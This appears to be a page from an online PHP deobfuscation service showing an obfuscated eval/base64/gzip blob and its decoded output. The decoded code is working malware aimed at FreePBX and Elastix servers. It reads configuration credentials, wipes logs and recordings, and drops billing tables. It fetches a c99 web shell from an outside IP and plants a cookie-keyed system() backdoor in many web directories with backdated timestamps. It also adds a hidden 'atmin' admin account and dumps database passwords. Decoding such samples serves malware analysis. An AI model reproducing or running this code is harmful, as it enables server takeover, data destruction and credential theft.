Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzuncompress(base64_decode("eJwNV7WuxUqy/ZeJ7pUDM2k0gZmZnTx5m5nx69/JWt1qqbSq..
Decoded Output download
ini_set('error_reporting', 0);
$file = is_file("/etc/asterisk/freepbx.conf")?"/etc/asterisk/freepbx.conf":"/etc/freepbx.conf";
is_file($file)?eval(str_replace(array('<?php','?>','require','include'),array('','','#require','#include'),file_get_contents($file))):'';
$amp_conf=(isset($amp_conf)?$amp_conf:array());
$amportal=array();
foreach(explode("
",file_get_contents("/etc/amportal.conf")) as $key => $val)
{
if(preg_match_all("/=/",$val,$amp3))
{
$exx=explode("=",$val);
$amportal[$exx[0]]=trim((isset($amp_conf[$exx[0]])?$amp_conf[$exx[0]]:str_replace($exx[0].'=','',$val)));
}
}
$amp = array_merge(array('AMPDBUSER' => 'asteriskuser','AMPDBNAME' => 'asterisk'),$amp_conf,$amportal);
$oldcwd=getcwd();
is_dir($amp["AMPWEBROOT"])?chdir($amp["AMPWEBROOT"]):"";
$freespace=(disk_free_space(getcwd()) / 1024 / 1024);
if($freespace < 100)
{
@exec("nohup find /var/log/ -type f | xargs -I {} cp /dev/null {} &");
@exec("nohup rm /tmp/* /var/spool/asterisk/monitor/* /var/www/backup/*.gz &");
}
@exec("chmod 0000 /var/www/html/a2billing/");
$a2b= new simple_db_connect($amp['AMPDBHOST'],'a2billinguser','a2billing');
$a2b->select_db('mya2billing');
$a2b->query('drop table cc_ui_authen');
$a2b->query('drop table cc_agent');
$a2b->query('drop table cc_system_log');
$dirs=array($oldcwd.'/',getcwd().'/','/var/www/html/','/var/www/','/var/www/freepbx/','/var/www/localhost/','/opt/freepbx/');
foreach($dirs as $K => $V)
{
$dirs[]=$V.'panel/';
$dirs[]=$V.'recordings/';
$dirs[]=$V.'vtigercrm/';
$dirs[]=$V.'public_html/';
$dirs[]=$V.'html/';
$dirs[]=$V.'freepbx/';
}
$dirs=array_unique($dirs);
sort($dirs);
$contents=array(
'c' => file_get_contents('http://51.158.24.25/t/c99.txt'),
'codes' => '<?php $cmd=(md5(sha1($_COOKIE["t3rr0r"]))=="aeb1ae6d167d80abb38e8e07eae36170")? $_COOKIE["cmd"]: "echo \'Unauthorized T\'"; system($cmd); ?>'
);
$freespace=(disk_free_space(getcwd()) / 1024 / 1024);
if($freespace > 100)
{
foreach($dirs as $k => $where)
{
if(is_dir($where))
{
(is_writeable($where))? write_dir($where): '';
$od=opendir($where);
while($rd=readdir($od))
{
$wd=$where.'/'.$rd;
(($rd != '..') && ($rd != '.')&& is_writeable($wd) && is_dir($wd))? write_dir($wd): '';
}
}
}
icwrite_dirs("/var/www/html/admin/modules/_cache/");
icwrite_dirs("/var/www/html/admin/modules/");
icwrite_dirs("/var/www/html/admin/assets/");
icwrite_dirs("/var/www/html/admin/libraries/");
icwrite_dirs("/var/www/html/recordings/misc/");
icwrite_dirs("/var/www/html/recordings/lang/");
}
$pass=random_password();
if(count($amp) > 3)
{
echo "
[+] Config Fetched ..";
$db = new simple_db_connect($amp['AMPDBHOST'],$amp['AMPDBUSER'],$amp['AMPDBPASS']);
echo "
[+] Connected To Database server ..";
$db->select_db($amp['AMPDBNAME']);
echo "
[+] Connected To Database ..";
$db->query("delete from ampusers where username='atmin'",'
[-] Issue Deleting User');
$query = $db->query("INSERT INTO `ampusers` ( `username`, `password_sha1`, `sections` ) VALUES ( 'atmin', '".sha1($pass)."', '*' );","
[-] Wrong Column ,, trying another column ..");
if(!$query){ $query = $db->query("INSERT INTO `ampusers` ( `username`, `password`, `sections` ) VALUES ( 'atmin', '$pass', '*' );","
[-]Couldn't Determine Column .. Should Add admin Manually .."); }
if($query){ echo "
[+] Admin User Added ..
[+] atmin : $pass
"; }
is_dir("../admin")? @symlink('../admin','atmin') : "";
is_dir("/var/www/html/admin")? @symlink('/var/www/html/admin','/var/www/html/recordings/atmin') : "";
}
else
{
echo "
[-] Should Work Manually on this server ..
";
}
if(is_file("/var/www/html/libs/paloSantoDB.class.php"))
{
include_once "/var/www/html/libs/paloSantoDB.class.php";
include_once "/var/www/html/libs/paloSantoACL.class.php";
$pDB = new paloDB("sqlite3:////var/www/db/acl.db");
$pACL = new paloACL($pDB);
$query="SELECT id from acl_user where name='atmin'";
$iddb = $pDB->fetchTable($query);
$tid=$iddb[0][0];
if($tid < 2)
{
$pACL->createUser('atmin', '', md5($pass), '');
$iddb = $pDB->fetchTable($query);
$tid=$iddb[0][0];
}
$pACL->changePassword($tid,md5($pass));
$pACL->addToGroup($tid,1);
echo "
[+] Admin User Added ..
[+] atmin : $pass
";
}
echo "-----------AMPDB-----------
";
@system("grep AMPDB /etc/amportal.conf");
echo "-----------ARI_ADMIN-----------
";
@system("grep ARI_ADMIN /etc/amportal.conf");
echo "-----------AMPMGR-----------
";
@system("grep AMPMGR /etc/amportal.conf");
echo "-----------PASS-----------
";
@system("grep PASS /etc/amportal.conf");
echo "------------Thats-All----------
";
function write_dir($where)
{
write_file($where.'/config.all.php','c');
write_file($where.'/phpversions.php','codes');
}
function icwrite_dirs($where)
{
write_file($where.'/config.php','c');
write_file($where.'/index.php','codes');
}
function write_file($fname,$wtw)
{
GLOBAL $contents;
if($contents[$wtw] !== '')
{
file_put_contents($fname,$contents[$wtw]);
touch($fname,strtotime('-10 years',time()));
}
}
function random_password($length=7)
{
$set=array_merge(range('A', 'Z'), range('a', 'z'), range('0', '9'));
$str = 't';
for($i=0;$i<$length;$i++)
{
$str .= $set[rand(0, count($set)-1)];
}
return $str;
}
class simple_db_connect
{
var $link;
function simple_db_connect($host,$username,$password)
{
if(function_exists('mysqli_connect'))
{
$this->link = mysqli_connect($host,$username,$password) or print(mysqli_error($this->link));
}
elseif(function_exists('mysql_connect'))
{
$this->link = mysql_connect($host,$username,$password) or print(mysql_error());
}
}
function select_db($dbname)
{
if(function_exists('mysqli_select_db'))
{
mysqli_select_db($this->link,$dbname) or print(mysqli_error($this->link));
}
elseif(function_exists('mysql_select_db'))
{
mysql_select_db($dbname,$this->link) or print(mysql_error());
}
return true;
}
function query($query_data,$error_message='')
{
global $con;
if(function_exists('mysqli_query'))
{
$query = mysqli_query($this->link,$query_data) or print($error_message.mysqli_error($this->link));
}
elseif(function_exists('mysql_query'))
{
$query = mysql_query($query_data,$this->link) or print($error_message.mysql_error());
}
return $query;
}
}
@system("rm -rf /tmp/*.txt /tmp/*.php");Did this file decode correctly?
Original Code
<?php
eval(gzuncompress(base64_decode("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")));
?>
Function Calls
| gzuncompress | 11 |
| base64_decode | 11 |
Stats
| MD5 | 73b827f5d92d91e96cd6367b691d08d2 |
| Eval Count | 11 |
| Decode Time | 113 ms |